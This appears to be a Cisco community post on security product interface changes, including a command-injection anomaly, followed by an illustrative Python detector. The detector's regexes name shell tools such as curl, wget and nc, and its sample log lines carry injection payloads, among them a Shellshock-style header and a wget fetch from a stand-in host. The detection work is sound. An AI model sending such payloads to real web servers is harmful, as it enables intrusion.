aligarci
Cisco Employee

User Experience Enhancements


As part of the Cisco Common User Experience program, we are working towards a more uniform user experience and terminology alignment. This program runs across all Cisco security products.

 

Cognitive Intelligence changing its name to global threat alerts

As part of Cisco’s continuous efforts to bring more clarity into our security portfolio, Cognitive Intelligence will be changing its name to global threat alerts. You will start seeing the new name in the web interface, documentation, and other places soon.

 

Starting February 2nd, the new web interface with alert fusion will be the default view

The alert fusion interface, introduced last summer as a beta version accessible using the early access switch, will now be the default view of the web interface.


Figure 1: Alert fusion interface will be the default view starting February 2nd

 

Due to the changes in the way that alerts are fused together, the global threat alerts (formerly Cognitive Intelligence) widget in Secure Network Analytics (formerly Stealthwatch Enterprise) is also changing its look.


Figure 2: New look of global threat alerts inside Secure Network Analytics dashboard

 

New features added to the alert fusion interface

Time filter

Now you can filter by time in a fast and convenient way. You can choose from the list of the most-used options (last day, last 7 days, last 30 days, and last 45 days) or specify starting and ending dates.


Figure 3: Filter by time with one click using any of the most-used options

 

Open search box

To ease your threat investigations, you can now use the open search box to quickly filter and find alerts for a specific username, client IP address, asset group, or type of threat.


Figure 4: Filter your alerts by username, client IP address, asset group, or threat name

 

New descriptions added for command-injection classifier

This anomaly triggers when a specific pattern is found in the User-Agent header of the HTTP request. The presence of these patterns gives us certainty that the web page was accessed with the intention of exploiting a vulnerability. This can signal reconnaissance steps taken in order to initiate an attack against that web page.

This anomaly can be seen in Alert -> Alert detail -> Anomalies.


Figure 5: New anomaly for command-injection exploitation attempt
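
To make the idea of matching patterns in the User-Agent concrete, here is a small detector run over proxy log lines. It is an added example, not Cisco's classifier: the three patterns, the combined log format, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Illustrative heuristics only (assumed for this example, not Cisco's rules).
PATTERNS = {
    # Shell function-definition prefix placed in a header value.
    "shell-function-prefix": re.compile(r"\(\)\s*\{"),
    # $(...) or `...` command substitution.
    "command-substitution": re.compile(r"\$\([^)]*\)|`[^`]+`"),
    # Separator followed by a common binary name, with optional /bin-style path.
    "chained-command": re.compile(
        r"[;&|]\s*(?:/(?:usr/)?s?bin/)?(?:sh|bash|curl|wget|nc|id|uname)\b"),
}

# Client address is the first field; User-Agent is the last quoted field.
LINE_RE = re.compile(r'^(\S+) .*"((?:[^"\\]|\\.)*)"\s*$')

# Constructed sample lines in combined log format (documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Feb/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"',
    '198.51.100.7 - - [02/Feb/2021:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '404 0 "-" "() { :; }; /usr/bin/id"',
    '203.0.113.5 - - [02/Feb/2021:10:00:03 +0000] "GET /search HTTP/1.1" 200 90 '
    '"-" "Mozilla/5.0 $(uname -a)"',
    '198.51.100.23 - - [02/Feb/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"curl/7.68.0%3B%20wget%20http://example.invalid/a"',
    '192.0.2.44 - - [02/Feb/2021:10:00:05 +0000] "GET /robots.txt HTTP/1.1" 200 40 '
    '"-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
]

def scan(lines):
    """Return (client, matched pattern names) for each suspicious line."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        # Decode %XX first so encoded separators are seen by the patterns.
        client, agent = m.group(1), unquote(m.group(2))
        names = sorted(n for n, rx in PATTERNS.items() if rx.search(agent))
        if names:
            hits.append((client, names))
    return hits

if __name__ == "__main__":
    for client, names in scan(SAMPLE_LOG):
        print(client, ", ".join(names))
```

The browser and crawler lines pass untouched even though they contain semicolons, and the percent-encoded line is flagged only because the header is decoded before matching.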

 

 


Leveraging global threat alerts (Cognitive Intelligence)

Global threat alerts (formerly Cognitive Intelligence) capabilities are available to Secure Endpoint (formerly Advanced Malware Protection or AMP for endpoints) customers with a compatible web proxy such as the Secure Web Appliance (formerly Web Security Appliance), and all Secure Network Analytics (formerly Stealthwatch Enterprise) customers. Reach out to your account executive to learn how to turbocharge your existing cybersecurity investment with global threat alerts.
